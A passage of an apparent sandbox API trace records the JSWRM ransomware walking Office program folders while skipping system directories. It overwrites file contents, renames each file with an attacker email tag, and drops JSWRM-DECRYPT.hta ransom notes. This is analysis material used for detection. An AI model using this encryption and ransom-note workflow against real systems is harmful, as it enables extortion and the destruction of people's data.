ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b382177, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1da59c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mset7jp.kic", cAlternateFileName="")) returned 1 [0136.177] lstrcmpiW (lpString1="mset7jp.kic", lpString2=".") returned 1 [0136.177] lstrcmpiW (lpString1="mset7jp.kic", lpString2="..") returned 1 [0136.177] lstrcmpiW (lpString1="mset7jp.kic", lpString2="...") returned 1 [0136.177] lstrcmpiW (lpString1="mset7jp.kic", lpString2="windows") returned -1 [0136.177] lstrcmpiW (lpString1="mset7jp.kic", lpString2="recovery") returned -1 [0136.177] lstrcmpiW (lpString1="mset7jp.kic", lpString2="perflogs") returned -1 [0136.177] lstrcmpiW (lpString1="mset7jp.kic", lpString2="documents and settings") returned 1 [0136.177] lstrcmpiW (lpString1="mset7jp.kic", lpString2="$RECYCLE.BIN") returned 1 [0136.177] lstrcmpiW (lpString1="mset7jp.kic", lpString2="system volume information") returned -1 [0136.177] lstrcmpiW (lpString1="mset7jp.kic", lpString2="msocache") returned -1 [0136.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7jp.kic", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7jp.kic", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7jp.kic", lpUsedDefaultChar=0x0) returned 11 [0136.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7jp.kic", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7jp.kic", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7jp.kic", lpUsedDefaultChar=0x0) returned 11 [0136.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7jp.kic" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7jp.kic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.178] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1942940) returned 1 [0136.178] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.178] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0136.197] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.197] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0136.198] CloseHandle (hObject=0x45c) returned 1 [0136.198] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7jp.kic" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7jp.kic"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7jp.kic.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7jp.kic.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.199] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b35bf1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x76e68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mset7tk.dll", cAlternateFileName="")) returned 1 [0136.199] lstrcmpiW (lpString1="mset7tk.dll", lpString2=".") returned 1 [0136.199] lstrcmpiW (lpString1="mset7tk.dll", lpString2="..") returned 1 [0136.199] lstrcmpiW (lpString1="mset7tk.dll", lpString2="...") returned 1 [0136.199] lstrcmpiW (lpString1="mset7tk.dll", lpString2="windows") returned -1 [0136.199] lstrcmpiW (lpString1="mset7tk.dll", lpString2="recovery") returned -1 [0136.199] lstrcmpiW (lpString1="mset7tk.dll", lpString2="perflogs") returned -1 [0136.199] lstrcmpiW (lpString1="mset7tk.dll", lpString2="documents and settings") returned 1 [0136.199] lstrcmpiW (lpString1="mset7tk.dll", lpString2="$RECYCLE.BIN") returned 1 [0136.199] lstrcmpiW (lpString1="mset7tk.dll", lpString2="system volume information") returned -1 [0136.200] lstrcmpiW (lpString1="mset7tk.dll", lpString2="msocache") returned -1 [0136.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7tk.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7tk.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7tk.dll", lpUsedDefaultChar=0x0) returned 11 [0136.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7tk.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7tk.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7tk.dll", lpUsedDefaultChar=0x0) returned 11 [0136.200] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b35bf1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeda80, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mset7tkjp.dll", cAlternateFileName="MSET7T~1.DLL")) returned 1 [0136.200] lstrcmpiW (lpString1="mset7tkjp.dll", lpString2=".") returned 1 [0136.200] lstrcmpiW (lpString1="mset7tkjp.dll", lpString2="..") returned 1 [0136.200] lstrcmpiW (lpString1="mset7tkjp.dll", lpString2="...") returned 1 [0136.200] lstrcmpiW (lpString1="mset7tkjp.dll", lpString2="windows") returned -1 [0136.200] lstrcmpiW (lpString1="mset7tkjp.dll", lpString2="recovery") returned -1 [0136.200] lstrcmpiW (lpString1="mset7tkjp.dll", lpString2="perflogs") returned -1 [0136.200] lstrcmpiW (lpString1="mset7tkjp.dll", lpString2="documents and settings") returned 1 [0136.200] lstrcmpiW (lpString1="mset7tkjp.dll", lpString2="$RECYCLE.BIN") returned 1 [0136.200] lstrcmpiW (lpString1="mset7tkjp.dll", lpString2="system volume information") returned -1 [0136.200] lstrcmpiW (lpString1="mset7tkjp.dll", lpString2="msocache") returned -1 [0136.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7tkjp.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7tkjp.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7tkjp.dll", lpUsedDefaultChar=0x0) returned 13 [0136.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7tkjp.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7tkjp.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7tkjp.dll", lpUsedDefaultChar=0x0) returned 13 [0136.200] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b35bf1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fca8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msfad.dll", cAlternateFileName="")) returned 1 [0136.200] lstrcmpiW (lpString1="msfad.dll", lpString2=".") returned 1 [0136.200] lstrcmpiW (lpString1="msfad.dll", lpString2="..") returned 1 [0136.200] lstrcmpiW (lpString1="msfad.dll", lpString2="...") returned 1 [0136.200] lstrcmpiW (lpString1="msfad.dll", lpString2="windows") returned -1 [0136.200] lstrcmpiW (lpString1="msfad.dll", lpString2="recovery") returned -1 [0136.200] lstrcmpiW (lpString1="msfad.dll", lpString2="perflogs") returned -1 [0136.200] lstrcmpiW (lpString1="msfad.dll", lpString2="documents and settings") returned 1 [0136.200] lstrcmpiW (lpString1="msfad.dll", lpString2="$RECYCLE.BIN") returned 1 [0136.201] lstrcmpiW (lpString1="msfad.dll", lpString2="system volume information") returned -1 [0136.201] lstrcmpiW (lpString1="msfad.dll", lpString2="msocache") returned -1 [0136.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msfad.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msfad.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msfad.dll", lpUsedDefaultChar=0x0) returned 9 [0136.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msfad.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msfad.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msfad.dll", lpUsedDefaultChar=0x0) returned 9 [0136.201] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b3a83c3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b3a83c3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSIPC", cAlternateFileName="")) returned 1 [0136.201] lstrcmpiW (lpString1="MSIPC", lpString2=".") returned 1 [0136.201] lstrcmpiW (lpString1="MSIPC", lpString2="..") returned 1 [0136.201] lstrcmpiW (lpString1="MSIPC", lpString2="...") returned 1 [0136.201] lstrcmpiW (lpString1="MSIPC", lpString2="windows") returned -1 [0136.201] lstrcmpiW (lpString1="MSIPC", lpString2="recovery") returned -1 [0136.201] lstrcmpiW (lpString1="MSIPC", lpString2="perflogs") returned -1 [0136.201] lstrcmpiW (lpString1="MSIPC", lpString2="documents and settings") returned 1 [0136.201] lstrcmpiW (lpString1="MSIPC", lpString2="$RECYCLE.BIN") returned 1 [0136.201] lstrcmpiW (lpString1="MSIPC", lpString2="system volume information") returned -1 [0136.201] lstrcmpiW (lpString1="MSIPC", lpString2="msocache") returned -1 [0136.201] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\jswrm-decrypt.hta")) returned 0xffffffff [0136.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.203] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.203] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0136.204] CloseHandle (hObject=0x45c) returned 1 [0136.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\jswrm-decrypt.hta")) returned 0x20 [0136.205] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b3a83c3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47d78c0f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0136.205] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.205] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b3a83c3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47d78c0f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0136.205] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.205] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.205] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99462e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99462e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99462e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ar", cAlternateFileName="")) returned 1 [0136.206] lstrcmpiW (lpString1="ar", lpString2=".") returned 1 [0136.206] lstrcmpiW (lpString1="ar", lpString2="..") returned 1 [0136.206] lstrcmpiW (lpString1="ar", lpString2="...") returned 1 [0136.206] lstrcmpiW (lpString1="ar", lpString2="windows") returned -1 [0136.206] lstrcmpiW (lpString1="ar", lpString2="recovery") returned -1 [0136.206] lstrcmpiW (lpString1="ar", lpString2="perflogs") returned -1 [0136.206] lstrcmpiW (lpString1="ar", lpString2="documents and settings") returned -1 [0136.206] lstrcmpiW (lpString1="ar", lpString2="$RECYCLE.BIN") returned 1 [0136.206] lstrcmpiW (lpString1="ar", lpString2="system volume information") returned -1 [0136.206] lstrcmpiW (lpString1="ar", lpString2="msocache") returned -1 [0136.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ar\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ar\\jswrm-decrypt.hta")) returned 0xffffffff [0136.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ar\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ar\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.208] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.208] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.209] CloseHandle (hObject=0x238) returned 1 [0136.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ar\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ar\\jswrm-decrypt.hta")) returned 0x20 [0136.209] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ar\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99462e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99462e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47d78c0f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x232100 [0136.209] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.209] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99462e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99462e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47d78c0f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.209] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.209] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.209] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47d78c0f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47d78c0f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47da03a3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.209] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.209] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.209] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.209] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.209] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.209] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.209] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.209] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.209] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.209] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.210] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf99462e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99462e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9992797, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4c98, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.210] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.210] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.210] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.210] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.210] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.210] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.210] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.210] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.210] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.210] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, 